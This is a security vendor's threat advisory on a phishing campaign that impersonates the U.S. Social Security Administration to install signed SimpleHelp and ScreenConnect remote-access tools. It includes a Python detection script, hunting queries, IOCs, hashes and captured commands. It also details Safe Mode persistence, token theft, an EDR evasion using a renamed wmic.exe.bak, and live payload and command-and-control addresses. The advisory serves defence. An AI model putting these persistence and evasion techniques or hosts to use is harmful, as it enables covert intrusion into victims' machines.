VENOMOUS#HELPER: Dual-RMM Phishing Campaign Leveraging JWrapper-Packaged SimpleHelp and ScreenConnect for Silent Remote Access

By Securonix Threat Research: Akshay Gaikwad, Shikha Sangwan, Aaron Beardslee

tldr:

Phishing campaigns leveraging remote management tools are nothing new. Securonix Threat Research has conducted in-depth dynamic analysis of an ongoing phishing campaign, active since at least April 2025, that targets victims through multiple vectors. The campaign has impacted over 80 organizations, predominantly in the United States, spanning multiple sectors. It leverages vendor-signed Remote Monitoring and Management (RMM) software to establish silent, persistent access: customized SimpleHelp and ScreenConnect RMM packages are used to bypass defenses, since they are installed as legitimate software by the unsuspecting victim. This campaign appears to have been tracked previously and independently by Sophos (as STAC6405) and by Red Canary; the indicators and behavior in this advisory support and extend the depth of their respective research.

The campaign is notable for deploying two independent RMM tools simultaneously, a self-hosted SimpleHelp 5.0.1 instance and a ScreenConnect relay, creating a redundant dual-channel access architecture that survives remediation of either channel independently. Infection originates from SSA government impersonation phishing where the victim is directed to verify their email and download a purported SSA statement. After the user opens the ‘SSA statement’, the malware silently installs itself as a Windows service with Safe Mode persistence, automated security posture surveillance running every 67 seconds, and operator presence detection polling every 23 seconds. No attribution has been formally assigned; Securonix assesses this activity is consistent with a financially motivated Initial Access Broker (IAB) or ransomware precursor operation targeting the Western economic bloc.

Key Findings:

| Attribute | Detail |
|---|---|
| Campaign Name | STAC6405 (Sophos cluster) |
| Active Since | April 2025 (ongoing) |
| Primary Targets | United States, Western Europe, Latin America (9 languages) |
| Initial Vector | U.S. Social Security Administration (SSA) government impersonation phishing → compromised [.]com.mx frontend → payload download |
| Phishing Frontend | gruta[.]com.mx (email harvesting; attacker-controlled or compromised .com.mx domain currently serving live SSA phishing content (Google-indexed)) |
| Payload Host | server.cubatiendaalimentos[.]com[.]mx/~tiendazoycom/sns/ (legitimate Mexican grocery e-commerce site (PrestaShop); payload hosted under a separate shared hosting account (~tiendazoycom) on the same server) |
| Primary RMM | SimpleHelp 5.0.1 (self-hosted, cracked build) via JWrapper |
| Secondary RMM | ConnectWise ScreenConnect (self-hosted relay, port 8041) |
| Persistence | Windows SCM service + SafeBoot\Network registry key |
| Attribution | Unattributed; assessed as financially motivated IAB/ransomware precursor |
| Infrastructure | 84.200.205[.]233:5555 (SimpleHelp C2); 213.136.71.246:8041 (ScreenConnect relay) |
| Relay Domain | sslzeromail[.]run.place -> 213.136.71.246 (IONOS DE, AS8560) |

Infection Chain: From Phishing Email to Persistent Access

The STAC6405 infection chain begins with a U.S. Social Security Administration (SSA) government impersonation phishing email and progresses through a multi-stage delivery pipeline before any malicious process executes on the victim host. The following stages were captured during dynamic analysis of the campaign.

Stage 0 — Delivery: SSA-Themed Phishing Email and Two-Stage Compromised Hosting

Victims receive an email impersonating the U.S. Social Security Administration, claiming a new statement is available for review. The email contains a link to a compromised legitimate Mexican business website (gruta[.]com.mx) rather than an attacker-registered domain, a deliberate technique to bypass Secure Email Gateway (SEG) reputation filtering, since established [.]com.mx domains carry legitimate reputation scores that newly registered attacker domains would lack.

The gruta[.]com.mx landing page presents a convincing SSA-branded verification page prompting the user to confirm their email address before ‘accessing their statement.’ This email harvesting step serves a dual purpose: it validates that the victim is real and attentive, and it gives the attacker a deliverable contact for follow-on campaigns.

Upon email submission, the victim is directed to download the payload from a second attacker-controlled host: server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe

This URL reveals a cPanel legacy shared hosting compromise. The tilde (~) prefix and username path (tiendazoycom) indicate the attacker gained access to a single cPanel user account on the legitimate hosting server, not the root server itself. The legitimate business site (cubatiendaalimentos[.]com.mx — a Cuban food retailer) remains unmodified; only the weaponized /~tiendazoycom/sns/ subdirectory is attacker-controlled. The /sns/ directory path is assessed as a deliberate reference to Social Security, maintaining lure consistency.

The downloaded file (statement5648.exe) exploits two Windows default behaviors to appear legitimate:

  • File extensions are hidden by default in Windows Explorer, causing ‘statement5648.exe’ to display as ‘statement5648’ masquerading as an authentic numbered government reference document
  • JWrapper embeds a custom application icon and splash image in the binary, further reinforcing the document appearance

UAC Prompt Social Engineering

When the victim double-clicks the lure, Windows User Account Control (UAC) displays a prompt before execution. Rather than the red ‘Unknown Publisher’ warning that malware typically triggers, the victim sees:

Verified publisher: SimpleHelp Ltd  ← Blue shield icon (trusted, Thawte-signed cert)

Do you want to allow this app to make changes to your device?

The victim is in the cognitive frame of opening a government SSA document. The UAC prompt naming ‘SimpleHelp Ltd’ as a verified publisher sounds plausible in a support context (‘help’ with your Social Security). The valid Thawte Authenticode certificate produces the blue verified shield rather than the red unknown publisher warning. These factors combine to substantially increase approval rates. This is the sole moment where victim interaction is required; every subsequent step of the infection chain runs silently with no further prompts.

Stage 1 — Initial Execution: JWrapper Bootstrap (statement5648.exe)

The phishing lure is a JWrapper-packaged Windows executable named to mimic official government or legal documents (e.g., statement5648.exe, ContractAgreementToSign.exe) — consistent with the SSA government impersonation pretext used in the delivery stage. When executed from the victim’s Downloads directory, the binary’s embedded extractor activates:

  • Reads and decrypts a 213KB encrypted configuration overlay appended after the PE sections
  • Extracts a bundled private JRE (Oracle Java 1.7.0_79, EOL 2015) to C:\ProgramData\JWrapper-Remote Access\
  • Decodes hex-encoded C2 configuration: sg_servers = udp://84.200.205[.]233:5555
  • Writes a JWLaunchProperties config file to disk, passes it to the JVM as an argument, then deletes it within milliseconds
  • The process runs entirely silently: sg_silent_install=true, show_no_ui=true, sg_install_shortcuts=false

The originating executable path (C:\Users\<victim>\Downloads\<lure>.exe) is permanently baked into every subsequent binary the installer generates, serving as a forensic origin marker.

Stage 2 — Service Installation: SimpleService.exe

SimpleService.exe reads the simplegateway.service config file and registers a persistent Windows service named ‘Remote Access Service’ via the Windows Service Control Manager (SCM). Beyond standard service registration, it performs two critical persistence operations:

  • Safe Mode Persistence: Writes to HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Remote Access Service, ensuring the RAT survives Safe Mode with Networking reboots — the most common defender response to persistent malware
  • Liveness Watchdog: Monitors the file C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\sgalive. If the RAT process fails to update this file, SimpleService.exe automatically restarts it, providing self-healing persistence

The service binary path set in the registry points back to SimpleService.exe with the service config file as its argument, ensuring the chain survives reboots.

Stage 3 — JVM Launch: SimpleGatewayService.exe

SimpleGatewayService.exe is a self-contained JWrapper launcher with the complete attacker C2 configuration baked into its 213KB encrypted binary overlay. It bootstraps the Java runtime and launches customer.jar — the core SimpleHelp RAT — with the following hardened JVM flags:

  • -Xrs: Suppresses OS signal handling, making the process resistant to SIGTERM and standard kill commands
  • -Djava.net.preferIPv4Stack=true: Forces IPv4 to avoid IPv6 routing issues on victim hosts
  • -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2: Explicitly downgrades TLS to support the EOL Java 1.7 runtime communicating with modern C2 infrastructure
  • -Xmx256m: Caps heap at 256MB to maintain a minimal memory footprint

Stage 4 — Session Escalation: session_win.exe + elev_win.exe

The RAT cannot interact with the user desktop from Session 0 (SYSTEM) without crossing session boundaries. It accomplishes this through a two-binary escalation chain:

  • session_win.exe acquires SeDebugPrivilege via AdjustTokenPrivileges, then enumerates running processes using CreateToolhelp32Snapshot to locate winlogon.exe in the target interactive session. It calls OpenProcessToken and DuplicateTokenEx to clone the Winlogon token, then uses CreateProcessAsUserW with CreateEnvironmentBlock to launch child processes in the victim’s desktop context
  • elev_win.exe handles UAC elevation via ShellExecuteEx with the ‘runas’ verb (Vista+) or CreateProcessWithLogonW with stored credentials (XP-era fallback). It also provides the –mouselocation switch for cursor position polling and –amiadministrator for privilege checking

This chain enables the attacker to achieve fully interactive desktop access — reading the screen, injecting keystrokes, and accessing user-context resources — all from a SYSTEM service.

Stage 5 — C2 Beacon and Dual-Channel Establishment

With the service running, the SimpleHelp gateway component connects outbound to the attacker’s self-hosted server:

  • Primary C2 channel: udp://84.200.205[.]233:5555 (SimpleHelp SimpleGateway protocol) — provides scripted command execution, automated monitoring, and file transfer
  • Secondary C2 channel: relay://sslzeromail[.]run.place:8041 (ScreenConnect relay) — provides interactive desktop access via ConnectWise ScreenConnect installed separately

The victim machine registers on the attacker’s console under its hostname (e.g., WKS-DEV01) with its campaign profile ID (sh_app_profile: 43794105415826700294423976831165084124). The attacker’s console immediately begins receiving automated telemetry from the continuous monitoring loop described in the Automated Surveillance Loop section below.

Both channels operate independently. If the ScreenConnect relay domain is taken down, the SimpleHelp channel survives, and vice versa. The attacker designed this redundancy deliberately to ensure access persists through partial remediation.

Why RMM Software Instead of Custom Malware

The central evasion insight of STAC6405 is that RMM software is inherently trusted. All SimpleHelp binaries carry valid Authenticode signatures from SimpleHelp Ltd issued by Thawte, a globally trusted CA. The ScreenConnect client is similarly signed by ConnectWise. This means:

  • Antivirus products will not flag the files — they pass signature-based checks at every stage
  • Windows SmartScreen and Mark-of-the-Web protections are bypassed by the valid code signatures
  • EDR behavioral rules must rely entirely on process lineage and parent-child relationships rather than file hashes
  • Network security controls see outbound connections to known commercial software endpoints, not to known-malicious C2 infrastructure

The specific SimpleHelp build deployed (version 5.0.1, compiled 2017-07-07) is consistent with a cracked or leaked package circulated in criminal forums since the 2016–2019 era. The expired certificate validity window (2015–2018) and the absence of any license authentication behavior confirm this is not a legitimately licensed deployment. This cracked distribution model means the attacker incurred zero acquisition cost and left no payment trail with the software vendor.

The Dual-RMM Architecture

The two RMM tools serve distinct operational roles that complement each other:

| Attribute | SimpleHelp (JWrapper) | ScreenConnect |
|---|---|---|
| Primary Role | Automated surveillance + scripted command execution | Interactive desktop access (hands-on-keyboard) |
| Protocol | UDP + HTTP (port 5555) | Proprietary relay (TCP port 8041) |
| C2 Host | 84.200.205[.]233 (undisclosed hosting) | 213.136.71.246 (IONOS DE, AS8560) |
| C2 Domain | None (IP-direct) | sslzeromail[.]run.place |
| Persistence | Windows service + SafeBoot registry key + liveness watchdog | Enrolled in attacker ScreenConnect tenant |
| Detection Difficulty | High (signed, legitimate vendor binary set) | High (signed ConnectWise client) |
| Redundancy Role | Survives ScreenConnect domain takedown | Survives SimpleHelp IP block |

SimpleHelp Capability Profile

The deployed SimpleHelp version (5.0.1) provides a comprehensive remote administration capability set. Analysis of customer.jar via static decompilation and runtime observation confirmed the following capabilities are present and enabled:

  • Full Remote Desktop (VNC-based): Complete interactive desktop control with screen capture, keyboard and mouse injection via SendInput/SetCursorPos APIs, and clipboard access
  • Shell / Command Execution: Scripted command execution via winpty-agent64.exe, a Windows pseudo-terminal bridge that provides a fully functional interactive shell session over named pipes. Supports cmd.exe, PowerShell, and any console application
  • Silent Session Access: RequireSessionConfirmation=false in serviceconfig.xml means the attacker connects with no victim notification, no taskbar popup, and no UI indicator of any kind
  • Cross-Session Process Injection: session_win.exe enables execution in the victim’s interactive desktop session from the SYSTEM service context by stealing a process token from winlogon.exe using SeDebugPrivilege and DuplicateTokenEx
  • UAC Elevation: elev_win.exe provides silent privilege elevation via ShellExecuteEx ‘runas’ verb (Vista+) or CreateProcessWithLogonW with credentials (XP-era), enabling execution as Administrator without user confirmation
  • File Transfer (Bidirectional): Full upload and download capability via the FSSync and FSMirror modules embedded in customer.jar
  • Windows Firewall Bypass: FirewallAdder utility silently calls netsh.exe to add firewall exceptions for the Remote Access Service without user notification
  • Scripting and Automation: AllowScripting=true in serviceconfig.xml enables the attacker to push and execute PowerShell, cmd, and other scripts without requiring an interactive desktop session
  • Self-Healing: AllowRecovery=true enables the attacker’s server to force service restarts and re-registration on the victim host remotely if the connection drops
  • Cross-Platform Support: customer.jar contains embedded macOS and Linux binaries (uidsetter32/64, LinuxServiceManager), indicating the same package is used across operating systems

Automated Surveillance Loop

Dynamic analysis of the deployed RAT over a one-hour observation window captured 986 Sysmon Event ID 1 (process creation) events generated entirely by the RAT’s background monitoring infrastructure with no operator interaction. Three independent polling loops run concurrently:

| Loop | Interval | Count / Hour | Command |
|---|---|---|---|
| WiFi Interface Monitor | ~15 seconds | 233x | netsh wlan show interfaces |
| User Presence Detection | ~23 seconds | 157x | elev_win.exe –mouselocation |
| Security Suite Enumeration | ~67 seconds | 54x each (4 queries) | wmic SecurityCenter2 + netsh advfirewall |

The equal execution counts across all four security enumeration queries (54x each) confirm these fire as a synchronized batch rather than independent triggers, a defining signature of automation rather than hands-on-keyboard activity.

Notable EDR Evasion: wmic.exe.bak

A particularly significant evasion technique was observed within the security enumeration loop. The RAT executes each SecurityCenter2 query via two separate paths simultaneously:

  1. Direct: Remote Access.exe → wmic.exe /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get
  2. Evasion: Remote Access.exe → cmd.exe → wmic.exe.bak /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get

wmic.exe.bak is a renamed copy of the legitimate wmic.exe binary placed at C:\Windows\System32\wbem\wmic.exe.bak. This technique bypasses name-based EDR detection rules that key on ‘wmic.exe’ while preserving identical functionality. The file C:\Windows\System32\wbem\wmic.exe.bak should be treated as a high-confidence static IOC indicating STAC6405 presence on a host.

Conclusion

At this stage of the attack, the threat actor has achieved a deeply entrenched position on the victim host with minimal forensic visibility: a persistent Windows service surviving Safe Mode reboots, two independent remote access channels operating over signed vendor binaries, a self-healing watchdog that restarts the RAT if it is killed, and a continuous automated surveillance loop reporting the victim’s security posture back to the attacker every 67 seconds, all without a single piece of traditional malware touching disk. The victim organization is left in a state where the attacker can return at any time, execute commands silently in the user’s desktop session, transfer files bidirectionally, and pivot to adjacent systems, while standard antivirus and signature-based controls see nothing but legitimately signed software from a reputable UK vendor. Remediation requires not only removing the service and registry keys but hunting for the renamed wmic.exe.bak binary, auditing the SafeBoot registry hive, and verifying that no second-stage payloads were delivered during any period of operator activity.

This campaign is a direct illustration of why behavioral analytics and host telemetry capable of identifying anomalous process lineage, automated polling patterns, and service installation from non-standard paths are essential: when the malware is the IT management software, the only thing that catches it is the behavior it leaves behind.

Securonix Recommendations

Behavioral analysis indicates the threat actor does not immediately engage hands-on-keyboard following infection. Instead, the RAT operates in a passive surveillance posture — continuously updating the attacker’s console with network state, security product inventory, and user presence data. Based on the mouse position polling cadence (every 23 seconds), Securonix assesses the operator monitors the victim’s idle state and activates only when cursor position has remained static for an extended period, consistent with the victim being away from their workstation. This ‘wait-for-idle’ pattern is a deliberate operational security technique to minimize the risk of the victim observing unauthorized desktop activity.

When an operator does engage, the automated monitoring baseline continues running underneath hands-on-keyboard activity. Defenders should watch for non-repeating, aperiodic process creation events from Remote Access.exe layered on top of the regular automated loop — particularly initial situational awareness commands (whoami, ipconfig, net user, systeminfo) issued in rapid succession, which constitute the operator’s orientation burst upon first interactive connection.

Securonix highly recommends high-fidelity endpoint monitoring, such as Sysmon, to capture process creation, network connections tied to processes, DNS resolution from the endpoint, and file creation events, providing a full picture of what is happening on the system. The commands listed in this advisory were captured via Sysmon Event ID 1 (Process Creation).
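As an added example (not Securonix's code or detection content), the following Python triages Sysmon Event ID 1 records for the three behaviours described above: the fixed-cadence polling loops and their synchronized SecurityCenter2 batch, the renamed wmic.exe.bak binary (found by comparing the on-disk image name with the PE OriginalFileName that Sysmon records), and an aperiodic orientation burst from Remote Access.exe layered on top of the loops. The event timeline, the exact file paths and the detection thresholds are constructed assumptions, not observed telemetry.

```python
# Added example (not Securonix's code): triage of Sysmon Event ID 1 (process creation)
# records for the STAC6405 behaviours this advisory describes. Every event below is
# constructed for the demonstration, not real telemetry; paths and cadences follow the text.
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev
import ntpath

T0 = datetime(2025, 9, 1, 12, 0, 0)  # constructed start of the observation window
RA = r"C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\Remote Access.exe"
ELEV = r"C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\elev_win.exe"
CMD = r"C:\Windows\System32\cmd.exe"
WMIC = r"C:\Windows\System32\wbem\wmic.exe"
AV_QUERY = r"/namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get"
PRESENCE_CMD = "elev_win.exe \u2013mouselocation"  # switch spelled as the advisory prints it


def ev(offset_s, image, parent, cmdline, original_name):
    """One constructed Sysmon EID 1 record, reduced to the fields the checks need."""
    return {"UtcTime": T0 + timedelta(seconds=offset_s), "Image": image,
            "ParentImage": parent, "CommandLine": cmdline, "OriginalFileName": original_name}


def sample_events():
    """Constructed timeline: the three automated loops plus one operator burst at t=300 s."""
    events = []
    for i in range(25):  # WiFi interface monitor, ~15 s cadence
        events.append(ev(15 * i, r"C:\Windows\System32\netsh.exe", RA, "netsh wlan show interfaces", "netsh.exe"))
    for i in range(16):  # user presence poll, ~23 s cadence
        events.append(ev(23 * i + 4, ELEV, RA, PRESENCE_CMD, "elev_win.exe"))
    for i in range(6):   # security suite enumeration, ~67 s cadence, direct and via wmic.exe.bak
        events.append(ev(67 * i + 9, WMIC, RA, "wmic.exe " + AV_QUERY, "wmic.exe"))
        events.append(ev(67 * i + 10, WMIC + ".bak", CMD, WMIC + ".bak " + AV_QUERY, "wmic.exe"))
    for k, cmd in enumerate(["whoami", "ipconfig", "net user", "systeminfo"]):  # orientation burst
        events.append(ev(300 + 3 * k, CMD, RA, "cmd.exe /c " + cmd, "Cmd.Exe"))
    return sorted(events, key=lambda e: e["UtcTime"])


def periodic_loops(events, min_count=5, max_cv=0.2):
    """Commands whose inter-arrival gaps are regular: {command_line: (count, mean_gap_s)}.
    Regularity is the coefficient of variation of the gaps; typed commands are never this uniform."""
    by_cmd = defaultdict(list)
    for e in events:
        by_cmd[e["CommandLine"]].append(e["UtcTime"])
    loops = {}
    for cmd, times in by_cmd.items():
        if len(times) < min_count:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        m = mean(gaps)
        if m > 0 and pstdev(gaps) / m <= max_cv:
            loops[cmd] = (len(times), round(m, 1))
    return loops


def synchronized_batches(loops):
    """Loop commands sharing count and cadence: one scheduled batch, not independent triggers."""
    groups = defaultdict(list)
    for cmd, key in loops.items():
        groups[key].append(cmd)
    return {key: sorted(cmds) for key, cmds in groups.items() if len(cmds) > 1}


def renamed_system_binaries(events):
    """Images whose on-disk name differs from the PE's OriginalFileName (e.g. wmic.exe.bak)."""
    hits = set()
    for e in events:
        if e["OriginalFileName"] and ntpath.basename(e["Image"]).lower() != e["OriginalFileName"].lower():
            hits.add(e["Image"])
    return sorted(hits)


def operator_bursts(events, parent_name="Remote Access.exe", window_s=60, min_distinct=3):
    """Aperiodic command clusters spawned by the RMM parent once loop commands are removed."""
    loop_cmds = set(periodic_loops(events))
    cands = [e for e in events if ntpath.basename(e["ParentImage"]).lower() == parent_name.lower()
             and e["CommandLine"] not in loop_cmds]
    bursts, current = [], []

    def flush():  # keep the cluster only if it holds several distinct commands
        if len({c["CommandLine"] for c in current}) >= min_distinct:
            bursts.append([c["CommandLine"] for c in current])

    for e in cands:
        if current and (e["UtcTime"] - current[-1]["UtcTime"]).total_seconds() > window_s:
            flush()
            current.clear()
        current.append(e)
    flush()
    return bursts


if __name__ == "__main__":
    evs = sample_events()
    loops = periodic_loops(evs)
    for cmd, (n, gap) in sorted(loops.items(), key=lambda kv: kv[1][1]):
        print(f"loop  {n:3d}x every ~{gap:.0f}s  {cmd}")
    print("synchronized batches:", synchronized_batches(loops))
    print("renamed binaries:", renamed_system_binaries(evs))
    print("operator bursts:", operator_bursts(evs))
```

On real telemetry, feed the functions the Image, ParentImage, CommandLine, OriginalFileName and UtcTime fields of each EID 1 record and tune min_count and max_cv to the observation window.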

MITRE ATT&CK Matrix

| Technique ID | Technique Name | Observed Behavior |
|---|---|---|
| T1566.001 | Phishing: Spearphishing Attachment | U.S. SSA government impersonation email with link to compromised [.]com.mx frontend |
| T1584.001 | Compromise Infrastructure: Domains | Two legitimate [.]com.mx business sites used for staging and delivery |
| T1219 | Remote Access Software | SimpleHelp + ScreenConnect deployed as dual-RMM |
| T1543.003 | Create or Modify System Process: Windows Service | Remote Access Service installed via SCM |
| T1562.009 | Impair Defenses: Safe Mode Boot | SafeBoot\Network registry key for Safe Mode persistence |
| T1134.001 | Access Token Manipulation: Token Impersonation | winlogon.exe token theft via session_win.exe |
| T1134.002 | Access Token Manipulation: Create Process with Token | CreateProcessAsUserW with stolen token |
| T1548.002 | Abuse Elevation Control Mechanism: Bypass UAC | elev_win.exe –runas via ShellExecuteEx |
| T1518.001 | Software Discovery: Security Software Discovery | SecurityCenter2 WMI queries every 67 seconds |
| T1016 | System Network Configuration Discovery | netsh wlan show interfaces every 15 seconds |
| T1036.003 | Masquerading: Rename System Utilities | wmic.exe renamed to wmic.exe.bak |
| T1497.001 | Virtualization/Sandbox Evasion: System Checks | Mouse position polling for user presence detection |
| T1027 | Obfuscated Files or Information | Hex-encoded C2 config in JWrapper launch properties |

Relevant Securonix detections

  • EDR-ALL-1215-ERR
  • WEL-ALL-1186-ERR
  • EDR-ALL-32-ERR
  • WEL-ALL-1101-ERR
  • EDR-ALL-159-RU
  • WEL-ALL-1120-RU
  • EDR-ALL-987-ERR
  • EDR-ALL-1385-ERR
  • EDR-ALL-846-ER
  • EDR-ALL-73-ER
  • EDR-ALL-54-ER
  • EDR-ALL-1295-ERR
  • EDR-ALL-1032-RU
  • EDR-ALL-1274-RU
  • EDR-SYM88-ERI
  • WEL-ALL-1144-ERR
  • EDR-SYM19-ERI

Relevant hunting queries

(remove square brackets “[ ]” for IP addresses or URLs)

  • index=activity AND rg_functionality="Next Generation Firewall" AND destinationhostname NOT NULL AND (destinationhostname CONTAINS "gruta[.]com.mx" OR destinationhostname CONTAINS "server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/" OR destinationhostname CONTAINS "server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe" OR destinationhostname CONTAINS "sslzeromail[.]run.place")
  • index=activity AND rg_functionality="Firewall" AND destinationhostname NOT NULL AND (destinationhostname CONTAINS "gruta[.]com.mx" OR destinationhostname CONTAINS "server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/" OR destinationhostname CONTAINS "server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe" OR destinationhostname CONTAINS "sslzeromail[.]run.place")
  • index=activity AND rg_functionality="Web Proxy" AND destinationhostname NOT NULL AND (destinationhostname CONTAINS "gruta[.]com.mx" OR destinationhostname CONTAINS "server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/" OR destinationhostname CONTAINS "server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe" OR destinationhostname CONTAINS "sslzeromail[.]run.place")
  • index=activity AND rg_functionality="Web Application Firewall" AND destinationhostname NOT NULL AND (destinationhostname CONTAINS "gruta[.]com.mx" OR destinationhostname CONTAINS "server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/" OR destinationhostname CONTAINS "server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe" OR destinationhostname CONTAINS "sslzeromail[.]run.place")
  • index=activity AND rg_functionality="DNS / DHCP" AND destinationhostname NOT NULL AND (destinationhostname CONTAINS "gruta[.]com.mx" OR destinationhostname CONTAINS "server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/" OR destinationhostname CONTAINS "server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe" OR destinationhostname CONTAINS "sslzeromail[.]run.place")
  • index=activity AND rg_functionality="IDS / IPS / UTM / Threat Detection" AND destinationhostname NOT NULL AND (destinationhostname CONTAINS "gruta[.]com.mx" OR destinationhostname CONTAINS "server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/" OR destinationhostname CONTAINS "server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe" OR destinationhostname CONTAINS "sslzeromail[.]run.place")
  • index=activity AND rg_functionality="Next Generation Firewall" AND ipaddress NOT NULL AND ipaddress IN ("213.136.71.246", "84.200.205[.]233")
  • index=activity AND rg_functionality="Firewall" AND ipaddress NOT NULL AND ipaddress IN ("213.136.71.246", "84.200.205.233")
  • index=activity AND rg_functionality="Web Proxy" AND ipaddress NOT NULL AND ipaddress IN ("213.136.71.246", "84.200.205.233")
  • index=activity AND rg_functionality="Web Application Firewall" AND ipaddress NOT NULL AND ipaddress IN ("213.136.71.246", "84.200.205[.]233")
  • index=activity AND rg_functionality="DNS / DHCP" AND ipaddress NOT NULL AND ipaddress IN ("213.136.71.246", "84.200.205.233")
  • index=activity AND rg_functionality="IDS / IPS / UTM / Threat Detection" AND ipaddress NOT NULL AND ipaddress IN ("213.136.71.246", "84.200.205.233")

Network IOCs

| Type | Indicator | Description |
|---|---|---|
| Domain | gruta[.]com.mx | Compromised legitimate MX domain (est. 2002, Index Datacom S.A. de C.V.) — live SSA phishing frontend |
| URL | server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/ | Likely attacker-established infrastructure (domain est. Feb 2024) — payload delivery |
| URL | server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe | Direct payload download URL |
| IPv4 | 84.200.205.233 | SimpleHelp C2 (UDP+HTTP :5555) |
| IPv4 | 213.136.71.246 | ScreenConnect relay host (IONOS DE, AS8560) |
| Domain | sslzeromail[.]run.place | ScreenConnect relay FQDN |
| URL | http[:]//84.200.205[.]233:5555/access/ | SimpleHelp updater/download endpoint |
| C2 Protocol | udp://84.200.205[.]233:5555 | SimpleHelp SimpleGateway C2 |
| C2 Protocol | relay://sslzeromail[.]run.place:8041/ | ScreenConnect relay URI |

Campaign Identifiers

| Type | Indicator | Description |
|---|---|---|
| Campaign ID | 43794105415826700294423976831165084124 | sh_app_profile — attacker SimpleHelp tenant ID (stable cross-victim) |
| Payload Hash | bce1222fc9e64aba4dd6f963dfd3377afa1844a1df9d5026e06990c8dc5246453b15e61c4f2e0349702a1940c71716e3d327e5224ac6d6e6a7b6c233c15f10f3 | shpkhash — payload package integrity token |
| JWrapper GU | 52861018 | JWrapper updater version baked into all installers |
| SCM Service | Remote Access Service | Windows service display name |
| Install Path | C:\ProgramData\JWrapper-Remote Access\ | Root installation directory |
| Liveness File | C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\sgalive | Watchdog heartbeat file |
| Static File IOC | C:\Windows\System32\wbem\wmic.exe.bak | Renamed wmic.exe — high-confidence host IOC |
| SafeBoot Key | HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Remote Access Service | Safe Mode persistence registry key |

Analyzed files/hashes

| File Name | SHA256 |
|---|---|
| customer.jar (SimpleHelp RAT core) | 810a99a7d6696a36491530e286476b4cf8a819a47fb5e3801fdfecfdb2dc6193 |
| SimpleGatewayService.exe | 641230a9f3091bdd38d04c6df96062bfc82dfc4ff6f663ceb522d3881d6af53a |
| SimpleService.exe | dbdddea03c3fc4c2574ce4221450ec86221ebc615c4915c4c4eb3f2a5e3f5b25 |
| session_win.exe | 9369d7194ab03362e9e7af022a48bc6d4e7d91a6ab7c4b5cf5d90abbcd8c7012 |
| elev_win.exe | 97f801e750cfc2d4558020fb246782e034fd6101d75a59d8915b4f2b2b50ebd9 |
| winpty-agent64.exe | 11914d10b51b5a96606ae606b5ab70d79550e36c1cce94a86134107c59075e0c |
| jwrapper_utils.jar | 76d85124db2778baecee24cc5ad56c9a3060c41c5b3c1b5cdc7f0435e0f77cac |
| serviceconfig.xml | d953dfbe8d91dc9fafad0a6117e1276fa636d4ae1b6a4d81616ff2446cf09234 |
| simplegateway.service | 3e4b3559fdbe584e19a1ff9b3142b429c6fb91aaa63b5c922c8c5b32c38e426a |

Commands Captured During Dynamic Analysis

| Process Name | Parent Process Name | Command Line |
|---|---|---|
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWApps\JRE-LastSuccessfulOptions-JWrapper-Windows64JRE-00052234686-complete" /e /g "Users":F |
| cacls.exe | Remote Access Monitoring.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\ProxyCredentials" /e /g "Users":F |
| cacls.exe | Remote Access Monitoring.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\jwLastRun" /e /g "Users":F |
| cacls.exe | Remote Access Monitoring.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\DetectedProxies" /e /g "Users":F |
| cacls.exe | Remote Access Monitoring.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwLastRun" /e /g "Users":F |
| cacls.exe | Remote Access Monitoring.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwLastRun" /e /g "Users":F |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\StopSimpleGatewayService.exe" /t /e /g "Users":F |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe" /e /p "Users":R |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWApps" /e /g "Users":F |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwLastRun" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete" /e /g "Users":F |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\DetectedProxies" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\ProxyCredentials" /e /g "Users":F |
